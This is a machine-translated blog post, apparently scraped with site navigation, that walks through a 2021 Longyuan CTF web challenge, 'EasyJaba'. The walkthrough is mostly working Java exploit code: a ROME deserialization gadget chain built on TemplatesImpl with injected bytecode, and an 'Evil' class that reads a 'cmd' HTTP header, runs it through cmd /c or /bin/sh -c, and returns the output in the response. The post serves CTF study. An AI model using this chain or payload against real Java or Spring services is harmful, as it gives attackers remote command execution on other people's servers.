当前位置:网站首页>Longyuan war "epidemic" 2021 network security competition web easyjaba
Longyuan war "epidemic" 2021 network security competition web easyjaba
2022-07-05 04:02:00 【Sk1y】
Longyuan war " Epidemic disease "2021 Cyber security competition Web EasyJaba
List of articles
View source code , Some classes are disabled
( Let's talk about the decompiler , I used it all the time jd-gui, But the attachment of this topic , Use jd-gui, Unable to see the disabled information , as follows ; And the screenshot above , It's using jdax1.4)
At the same time, it is found that rome1.0, So it's used rome1.0 That chain
HashMap Class is used to trigger hashCode, and BadAttributeValueExpException Class is used to trigger toString, Look at the source code of this topic , You can directly call object.toString, You don't need an entry class
Rewrite it rome chain
package Rome;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import com.sun.syndication.feed.impl.ObjectBean;
import com.sun.syndication.feed.impl.ToStringBean;
import javax.management.BadAttributeValueExpException;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Base64;
import java.util.HashMap;
public class Rome2 {
public static void unserialize(byte[] bytes) throws Exception{
ByteArrayInputStream bain = new ByteArrayInputStream(bytes);
ObjectInputStream oin = new ObjectInputStream(bain);
oin.readObject();
}
public static byte[] serialize(Object o) throws Exception{
try(ByteArrayOutputStream baout = new ByteArrayOutputStream();
ObjectOutputStream oout = new ObjectOutputStream(baout)){
oout.writeObject(o);
return baout.toByteArray();
}
}
public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
Field field = obj.getClass().getDeclaredField(fieldName);
field.setAccessible(true);
field.set(obj, value);
}
public static void main(String[] args) throws Exception {
// Malicious bytecode
byte[] code = Files.readAllBytes(Paths.get("D:\\project\\java\\cc1\\src\\main\\java\\Rome\\Evil.class"));
// byte[] code = Files.readAllBytes(Paths.get("D:\\project\\java\\test\\target\\classes\\calc1.class"));
TemplatesImpl templates = new TemplatesImpl();
setFieldValue(templates,"_name","sk1y"); // Cannot be set to null, Or return to null
setFieldValue(templates,"_class",null);
setFieldValue(templates,"_bytecodes",new byte[][]{
code});
setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());
ToStringBean toStringBean = new ToStringBean(Templates.class,templates);
// toStringBean.toString();
byte[] aaa = serialize(toStringBean);
System.out.println(Base64.getEncoder().encodeToString(aaa));
}
}
Not out of the network
Because the problem can't be solved , So it uses what is circulated on the Internet spring Malicious classes loaded without going out of the network
package Rome;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.lang.reflect.Method;
import java.util.Scanner;
public class Evil extends AbstractTranslet
{
@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
public Evil() throws Exception{
Class c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.RequestContextHolder");
Method m = c.getMethod("getRequestAttributes");
Object o = m.invoke(null);
c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.ServletRequestAttributes");
m = c.getMethod("getResponse");
Method m1 = c.getMethod("getRequest");
Object resp = m.invoke(o);
Object req = m1.invoke(o); // HttpServletRequest
Method getWriter = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.ServletResponse").getDeclaredMethod("getWriter");
Method getHeader = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.http.HttpServletRequest").getDeclaredMethod("getHeader",String.class);
getHeader.setAccessible(true);
getWriter.setAccessible(true);
Object writer = getWriter.invoke(resp);
String cmd = (String)getHeader.invoke(req, "cmd");
String[] commands = new String[3];
String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK":"UTF-8";
if (System.getProperty("os.name").toUpperCase().contains("WIN")) {
commands[0] = "cmd";
commands[1] = "/c";
} else {
commands[0] = "/bin/sh";
commands[1] = "-c";
}
commands[2] = cmd;
writer.getClass().getDeclaredMethod("println", String.class).invoke(writer, new Scanner(Runtime.getRuntime().exec(commands).getInputStream(),charsetName).useDelimiter("\\A").next());
writer.getClass().getDeclaredMethod("flush").invoke(writer);
writer.getClass().getDeclaredMethod("close").invoke(writer);
}
}
javac Compile to Evil.class, Load this malicious class
The final effect
see fmyyy Master's wp, You can actually use Hashtable Replace HashMap, Can also trigger hashCode, The original chain can be opened ( I didn't succeed , What should be the problem ), The specific links are placed below
Reference link
边栏推荐
- Rust blockchain development - signature encryption and private key public key
- MindFusion.Virtual Keyboard for WPF
- C language course setting: cinema ticket selling management system
- lds链接的 顺序问题
- Behavior perception system
- EasyCVR平台出现WebRTC协议视频播放不了是什么原因?
- 10种寻址方式之间的区别
- 我国算力规模排名全球第二:计算正向智算跨越
- Threejs clicks the scene object to obtain object information, and threejs uses raycaster to pick up object information
- kubernetes集群之调度系统
猜你喜欢
Threejs rendering obj+mtl model source code, 3D factory model
How about programmers' eyesight| Daily anecdotes
特殊版:SpreadJS v15.1 VS SpreadJS v15.0
@The problem of cross database query invalidation caused by transactional annotation
The new project Galaxy token just announced by coinlist is gal
Uni app change the default component style
ABP vNext microservice architecture detailed tutorial - distributed permission framework (Part 2)
IronXL for . NET 2022.6
UI automation test farewell to manual download of browser driver
KVM virtualization
随机推荐
Behavior perception system
Open graph protocol
面试字节,过关斩将直接干到 3 面,结果找了个架构师来吊打我?
error Couldn‘t find a package. JSON file in "your path“
Containerd series - what is containerd?
Phpmailer reported an error: SMTP error: failed to connect to server: (0)
How is the entered query SQL statement executed?
Nmap user manual learning records
[charging station]_ Secular wisdom_ Philosophical wisdom _
Is there a sudden failure on the line? How to make emergency diagnosis, troubleshooting and recovery
Possible stack order of stack order with length n
C # use awaiter
[understand series after reading] 6000 words teach you to realize interface automation from 0 to 1
3. Package the bottom navigation tabbar
postman和postman interceptor的安装
技术教程:如何利用EasyDSS将直播流推到七牛云?
陇原战“疫“2021网络安全大赛 Web EasyJaba
Differences among 10 addressing modes
Clickhouse同步mysql(基于物化引擎)
[software reverse - basic knowledge] analysis method, assembly instruction architecture